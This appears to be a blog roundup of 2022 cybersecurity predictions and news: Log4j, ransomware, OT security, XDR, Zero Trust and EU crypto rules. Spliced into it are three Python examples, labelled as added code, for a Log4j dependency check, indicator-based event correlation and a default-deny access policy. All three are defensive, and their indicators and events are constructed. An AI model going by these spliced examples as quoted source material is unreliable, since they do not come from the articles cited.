Nothing is more difficult than making predictions. Instead of throwing out wild ideas about what might be coming, I have collected here some trends that other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threat; it’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
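Given the number of packages that still resolve to a stale log4j-core, the first defensive step is an inventory of what a build actually pulls in. The following Python is an added example, not code from the articles quoted above: it parses the dependency line format printed by `mvn dependency:list` (the sample lines are constructed) and flags every log4j-core artifact below an operator-supplied minimum version. `MIN_SAFE_VERSION` is an assumed placeholder to be set from the Apache Log4j advisory for the CVEs listed above; the version parser exists because plain string comparison ranks 2.9.1 above 2.17.0.

```python
"""Dependency inventory check for stale log4j-core versions.

Added example, not code from the articles quoted on this page. It parses the
line format that `mvn dependency:list` prints (group:artifact:type:version:scope)
and flags every log4j-core artifact below an operator-supplied minimum version.
MIN_SAFE_VERSION is an assumed placeholder: take the real value from the Apache
Log4j security advisory for the CVEs you need fixed.
"""
import re
from typing import Iterator, List, NamedTuple, Tuple

MIN_SAFE_VERSION = "2.17.1"  # assumed placeholder; set from the vendor advisory

# Constructed sample output in the format printed by `mvn dependency:list`.
SAMPLE_DEPENDENCY_LIST = """\
[INFO] The following files have been resolved:
[INFO]    org.apache.logging.log4j:log4j-api:jar:2.14.1:compile
[INFO]    org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
[INFO]    com.example:some-library:jar:1.0.0:compile
[INFO]    org.apache.logging.log4j:log4j-core:jar:2.9.1:test
[INFO]    org.apache.logging.log4j:log4j-core:jar:2.17.1:runtime
"""


class Artifact(NamedTuple):
    group: str
    artifact: str
    version: str
    scope: str


# group:artifact:type:version:scope, as printed by the dependency plugin
_DEP_RE = re.compile(r"([\w.\-]+):([\w.\-]+):\w+:([\w.\-]+):(\w+)")


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.14.1' into (2, 14, 1) so comparison is numeric.

    String comparison gets this wrong: '2.9.1' > '2.17.0' lexically.
    Non-numeric suffixes (e.g. '-rc1') are ignored; missing parts count as 0.
    """
    parts = []
    for piece in version.split("."):
        match = re.match(r"\d+", piece)
        parts.append(int(match.group()) if match else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def parse_dependency_list(text: str) -> Iterator[Artifact]:
    """Yield one Artifact per resolved dependency line; other lines are skipped."""
    for line in text.splitlines():
        match = _DEP_RE.search(line)
        if match:
            group, artifact, version, scope = match.groups()
            yield Artifact(group, artifact, version, scope)


def find_vulnerable_log4j(text: str, min_safe: str = MIN_SAFE_VERSION) -> List[Artifact]:
    """Return every log4j-core artifact (any scope, test included) older than min_safe."""
    threshold = parse_version(min_safe)
    return [
        a for a in parse_dependency_list(text)
        if a.group == "org.apache.logging.log4j"
        and a.artifact == "log4j-core"
        and parse_version(a.version) < threshold
    ]


if __name__ == "__main__":
    for hit in find_vulnerable_log4j(SAMPLE_DEPENDENCY_LIST):
        print(f"STALE log4j-core {hit.version} ({hit.scope} scope)")
```

Run it against the real output of `mvn dependency:list` piped into `SAMPLE_DEPENDENCY_LIST`'s place; test-scope hits are reported too, because a vulnerable logger on the test classpath still executes on CI runners.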
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Linux’s real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product,” points out, constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development: operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission.”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
We’ve covered five main topics: 1. Malware, 2. Mobile, 3. Machine Learning and AI, 4. Ransomware (because we simply couldn’t not give it a section of its own), and 5. Where next? PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
• Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
Some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities.
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Mobile phone security is being overhauled
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a Keystore technology that allows an application to generate a system-maintained key and authenticate services (it still uses the TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension instructions added to the CPU chip. In this solution, TEE-type protections are provided by a secure enclave. This type of security enclave needs less code than the traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. This differs significantly from the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solutions will also come to smartphones. The Armv9-A architecture, announced last year, offers a Realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an unlimited number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Cyber attacks already threaten goods deliveries too
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll warns of a “cyber pandemic”: an internet disruption could throw the world into chaos again
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnéll says. So even with technology, the world will never be finished. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Cyber attacks are accelerating, but companies can respond to them
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time, in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack surface of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those strategies are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Extended Detection and Response (XDR) model to detect attacks on large networks
Trend Micro report: in the future everything is at risk
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
Ransomware Enforcement Operations in 2020 and 2021
https://www.recordedfuture.com/ransomware-enforcement-operations-in-2020-and-2021/
This report looks at international law enforcement operations and is based on data collected over the last 2 years. We first address common difficulties faced by law enforcement, then outline trends and observations by distinguishing between different types of law enforcement activities, and finally provide a timeline of all events.
Through this report, we aim to create an overview of the status quo and to better understand the effectiveness of law enforcement in the medium term.
Tomi Engdahl says:
Industry cyber maturity is being surveyed again
https://www.huoltovarmuuskeskus.fi/a/toimialojen-kyberkypsyytta-selvitetaan-jalleen
An understanding of the cyber maturity of the business sector is being gathered in a facilitated survey project run by the Digipooli of the National Emergency Supply Organisation (Huoltovarmuusorganisaatio).
The survey uses Kybermittari, the national assessment model prepared at the National Cyber Security Centre (Kyberturvallisuuskeskus), to interview more than 120 companies representing different industries.
Tomi Engdahl says:
The Importance of Open Source to an XDR Architecture
https://www.securityweek.com/importance-open-source-xdr-architecture
No longer satisfied with infecting files or systems, adversaries are now intent on crippling entire enterprises. Damaging supply chain, ransomware and wiper attacks are making headline news, impacting not only the organization but their stakeholders too. As threat actors’ approaches and targets change, our approach to detection and response is changing as well.
Extended Detection and Response (XDR) is now widely considered to be the most effective path forward to enable detection and response across the infrastructure, across all attack vectors, across different vendors, and across security technologies that are cloud based and on premises. Delivering on this promise requires ALL tools and ALL teams working in concert, so the “X factor” in an XDR architecture is integration. And this integration must be broad and deep so that organizations can get the most value out of their existing best-of-breed security solutions, including their free, open source tools.
Myriad open source threat feeds and intelligence sources provide important information and preventative measures for defending against existing and emerging threats. Additionally, MISP is a great source for information sharing. The MITRE ATT&CK extensive knowledgebase helps teams more deeply understand adversary campaigns and risk mitigations based on real-world observations. And connecting with TheHive accelerates incident response, which is the priority for many organizations. Individually, these tools offer tremendous benefits. But when you integrate them as part of an overall XDR architecture, their benefits are magnified in three ways.
1. Enrich events with critical data about the latest threats. Detection now requires a breadth and depth of information from disparate systems and sources brought into a single view, so you can gain a comprehensive understanding of the threat you are facing and know what you must defend.
2. Capture more value from existing teams and tools. Bi-directional integration ensures that data flows between teams and tools as part of existing workflows. With a software development kit (SDK) and easy-to-use APIs, integration with existing tools, including MISP and TheHive, is fast. When the right data can get to the right systems and teams at the right time, data utilization improves and teams are more efficient and effective because they are able to share actionable intelligence using tools they know and trust.
3. Take the right actions faster. Multiple systems are now involved in attacks, so response requires the capability to look beyond one file or system to find all related events and data across the organization. Connecting the dots and contextualizing with additional intelligence accelerates remediation and response to an incident across the infrastructure. MITRE ATT&CK plays a central role in helping teams expand their search for artifacts associated with a campaign within their environment, test hypotheses to confirm or disprove findings, and make decisions quickly about response and remediation. TheHive can support incident response, but you can also integrate with an ecosystem of tools to support a variety of use cases including spear phishing, threat hunting, alert triage and vulnerability management. With a deeper understanding of what is happening across your environment and integration across different tool sets, you can send associated data back to the right tools across your defensive grid immediately and automatically to take the right actions faster.
Many organizations first turn to open-source tools because they are free. Today, these tools have earned a loyal following as result of the tremendous value they deliver, and teams will continue to rely on them as an essential part of their security toolkit for decades to come. Now, as part of an XDR architecture where integration is broad and deep, there is an opportunity to elevate open source tools even further because, as ESG’s Jon Oltsik has said, “XDR assumes the whole is even greater than the sum of its parts.” Open source tools are an important part.
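The three benefits above (enriching events with threat data, sharing it between tools, and connecting related events across systems) come down to a join between events and a shared indicator set. The Python below is an added example, not code from the SecurityWeek article or from MISP, TheHive or any XDR product: it enriches events from two constructed sources with a constructed indicator list shaped like MISP attributes (ip-dst, domain, sha256), carries the ATT&CK technique an analyst has attached to each indicator (an assumed annotation), and groups hosts by campaign so a hit on one host surfaces the others. All indicator values, hostnames and the campaign label are made up.

```python
"""Event enrichment and cross-host correlation with a shared indicator feed.

Added example, not code from the SecurityWeek article above. The indicator
records mimic the attribute types a MISP export uses (ip-dst, domain, sha256);
the values, campaign label and sample events are constructed, and the
ATT&CK technique attached to each indicator is an assumed analyst annotation.
"""
from collections import defaultdict
from typing import Any, Dict, List, Tuple

# Constructed indicator feed (in practice pulled from MISP or another TI source).
INDICATORS: List[Dict[str, str]] = [
    {"type": "ip-dst", "value": "203.0.113.45", "technique": "T1071.001",
     "campaign": "SAMPLE-CAMPAIGN-A"},
    {"type": "domain", "value": "update-check.example", "technique": "T1071.001",
     "campaign": "SAMPLE-CAMPAIGN-A"},
    {"type": "sha256", "value": "a" * 64, "technique": "T1204.002",
     "campaign": "SAMPLE-CAMPAIGN-A"},
]

# Which event field carries which indicator type (assumed field names).
FIELD_TO_TYPE: Dict[str, str] = {"dst_ip": "ip-dst", "domain": "domain", "sha256": "sha256"}

# Constructed events from two tools: a web proxy and an endpoint agent.
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {"source": "proxy", "host": "ws-01", "dst_ip": "203.0.113.45"},
    {"source": "edr", "host": "ws-01", "sha256": "a" * 64},
    {"source": "proxy", "host": "ws-07", "domain": "update-check.example"},
    {"source": "proxy", "host": "ws-09", "dst_ip": "198.51.100.7"},  # benign, no hit
]


def build_index(indicators: List[Dict[str, str]]) -> Dict[Tuple[str, str], Dict[str, str]]:
    """Index indicators by (type, value) so each event lookup is a dict hit."""
    return {(i["type"], i["value"]): i for i in indicators}


def enrich(event: Dict[str, Any], index: Dict[Tuple[str, str], Dict[str, str]]) -> Dict[str, Any]:
    """Return a copy of the event with a 'matches' list of indicators it hit."""
    matches = []
    for field, ind_type in FIELD_TO_TYPE.items():
        if field in event:
            hit = index.get((ind_type, event[field]))
            if hit is not None:
                matches.append(hit)
    return {**event, "matches": matches}


def correlate(events: List[Dict[str, Any]],
              indicators: List[Dict[str, str]] = INDICATORS) -> Dict[str, Dict[str, List[str]]]:
    """Enrich every event and group hosts and techniques by campaign.

    Two events from different tools on different hosts end up in the same
    cluster because their indicators share a campaign label.
    """
    index = build_index(indicators)
    hosts_by_campaign: Dict[str, set] = defaultdict(set)
    techniques_by_campaign: Dict[str, set] = defaultdict(set)
    for ev in (enrich(e, index) for e in events):
        for m in ev["matches"]:
            hosts_by_campaign[m["campaign"]].add(ev["host"])
            techniques_by_campaign[m["campaign"]].add(m["technique"])
    return {
        campaign: {"hosts": sorted(hosts), "techniques": sorted(techniques_by_campaign[campaign])}
        for campaign, hosts in hosts_by_campaign.items()
    }


if __name__ == "__main__":
    for campaign, info in correlate(SAMPLE_EVENTS).items():
        print(campaign, "hosts:", info["hosts"], "techniques:", info["techniques"])
```

The campaign label is what turns three separate alerts on two hosts into one incident; the technique list is what an analyst would hand to a hunting query to look for the rest of the chain on the hosts that have not alerted yet.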
Tomi Engdahl says:
The Need for Resilient Zero Trust
https://www.securityweek.com/need-resilient-zero-trust
It is essential to ensure that any Zero Trust technology used is resilient to external factors
The growing threat of cyberattacks like SolarWinds, JBS USA, and Colonial Pipeline has underscored that organizations can no longer depend on conventional perimeter-based defenses to protect critical systems and data. The Log4j vulnerability is the latest sign that organizations must assume that cyber adversaries are already in their network. Against the backdrop of these high-profile incidents and growing concerns of retaliatory cyberattacks by Russia following its invasion of Ukraine, legislators have stepped up their efforts to bolster resilience and response capabilities against these threats (e.g., U.S. Cyber Incident Reporting for Critical Infrastructure Act, European Union Rules for Common Cybersecurity and Information Security Measures).
New regulations are aimed at shifting the cybersecurity paradigm – away from the old mantra of “trust but verify” and instead toward a Zero Trust approach, whereby access to applications and data is denied by default. Threat prevention is achieved by only granting access to networks and workloads utilizing policy informed by continuous, contextual, risk-based verification across users and their associated devices.
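The passage above states the rule (deny by default, grant only on continuous, contextual, risk-based verification of user and device) without showing what such a policy decision looks like. The Python below is an added example, not code from the SecurityWeek article or from any Zero Trust product: it scores a request from identity, device and network signals, allows it only when the score fits the risk budget of the resource's sensitivity class, and re-evaluates a granted session when a signal changes. The signal names, weights, budgets and the 1-to-3 sensitivity scale are assumptions chosen to illustrate the principle.

```python
"""Default-deny, risk-scored access decision with continuous re-evaluation.

Added example, not code from the SecurityWeek article above. The signals,
weights, thresholds and the sensitivity scale are assumptions chosen to
illustrate the principle; a real policy engine would take them from
identity, device-management and posture sources.
"""
from dataclasses import dataclass, replace
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class AccessContext:
    user: str
    mfa_verified: bool      # identity signal
    device_managed: bool    # device enrolled in management
    device_patched: bool    # posture signal, would come from the EDR/MDM agent
    network: str            # "corp", "home" or "unknown" (assumed labels)
    resource: str
    sensitivity: int        # assumed scale: 1 low, 2 medium, 3 high


# Assumed risk weights per network and the risk budget each sensitivity tolerates.
NETWORK_RISK: Dict[str, int] = {"corp": 0, "home": 10, "unknown": 30}
RISK_BUDGET: Dict[int, int] = {1: 60, 2: 30, 3: 10}


def risk_score(ctx: AccessContext) -> int:
    """Sum the risk contributions of the current signals (assumed weights)."""
    score = 0
    if not ctx.mfa_verified:
        score += 40
    if not ctx.device_managed:
        score += 30
    if not ctx.device_patched:
        score += 20
    # An unrecognised network label is treated as the riskiest one.
    score += NETWORK_RISK.get(ctx.network, NETWORK_RISK["unknown"])
    return score


def decide(ctx: AccessContext) -> Tuple[str, List[str]]:
    """Return ('allow' | 'deny', reasons).

    The default outcome is deny: access is granted only when the resource has
    a known sensitivity, the hard requirements hold, and the score fits the budget.
    """
    reasons: List[str] = []
    budget = RISK_BUDGET.get(ctx.sensitivity)
    if budget is None:
        return "deny", ["resource has no classified sensitivity"]
    if ctx.sensitivity >= 2 and not ctx.mfa_verified:
        reasons.append("MFA required for medium/high sensitivity")
    score = risk_score(ctx)
    if score > budget:
        reasons.append(f"risk {score} exceeds budget {budget}")
    if reasons:
        return "deny", reasons
    return "allow", [f"risk {score} within budget {budget}"]


class Session:
    """Holds a granted context and re-runs the decision whenever a signal
    changes, so a grant is never treated as permanent."""

    def __init__(self, ctx: AccessContext):
        self.ctx = ctx
        self.state, self.reasons = decide(ctx)

    def update(self, **changed) -> str:
        """Apply new signal values (e.g. device_patched=False) and re-decide."""
        self.ctx = replace(self.ctx, **changed)
        self.state, self.reasons = decide(self.ctx)
        return self.state


if __name__ == "__main__":
    req = AccessContext("alice", True, True, True, "corp", "hr-db", 3)
    session = Session(req)
    print(session.state, session.reasons)
    print(session.update(device_patched=False), session.reasons)
```

Two design points carry the Zero Trust meaning: an unknown sensitivity classification denies rather than falling through to a lenient default, and `Session.update` shows that verification is continuous, so a device that drops out of compliance mid-session loses access without waiting for the next login.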
Tomi Engdahl says:
Bradley Chambers / 9to5Mac:
Apple Business Essentials launches for all SMBs in the US, starting at $2.99/month; the management service is getting Google Workspace integration in the spring — After a beta period with tens of thousands of businesses, Apple is ready to extend simplified device management, iCloud Drive storage …
Apple Business Essentials is now available to all small businesses in the US, Google Workspace integration coming this spring
https://9to5mac.com/2022/03/31/apple-business-essentials-is-now-available/
Tomi Engdahl says:
Jack Schickler / CoinDesk:
The EU Parliament votes to outlaw anonymous crypto payments, extending KYC rules to even the smallest transactions with unhosted or self-hosted wallets — Lawmakers are set to end even the smallest anonymous crypto transactions, and plan measures that could see unregulated exchanges cut off.
EU Parliament Passes Privacy-Busting Crypto Rules Despite Industry Criticism
https://www.coindesk.com/policy/2022/03/31/eu-parliament-votes-on-privacy-busting-crypto-rules-industry-rails-against-proposals/
Lawmakers are set to end even the smallest anonymous crypto transactions, and plan measures that could see unregulated exchanges cut off.
European Union lawmakers voted today in favor of controversial measures to outlaw anonymous crypto transactions, a move the industry said would stifle innovation and invade privacy.
More than 90 lawmakers voted in favor of the proposal, according to documents seen by CoinDesk.
The proposals are intended to extend anti-money laundering (AML) requirements that apply to conventional payments over EUR 1,000 ($1,114) to the crypto sector. They also scrap the floor for crypto payments, so payers and recipients of even the smallest crypto transactions would need to be identified, including for transactions with unhosted or self-hosted wallets. Further measures under discussion could see unregulated crypto exchanges cut off from the conventional financial system.
National governments said in December they wanted to scrap the EUR 1,000 threshold for crypto, on the basis that digital payments can easily circumvent the limit, and to include private wallets that aren’t operated by regulated crypto asset providers.
Members of the center-right European People’s Party (EPP) opposed many of the more controversial changes, condemning what they called a “de facto ban of self-hosted wallets.”
“Such proposals are neither warranted nor proportionate,” said EPP economic spokesperson, Markus Ferber, in an emailed statement Thursday. “With this approach of regulating new technologies, the European Union will fall further behind other, more open-minded jurisdictions.”
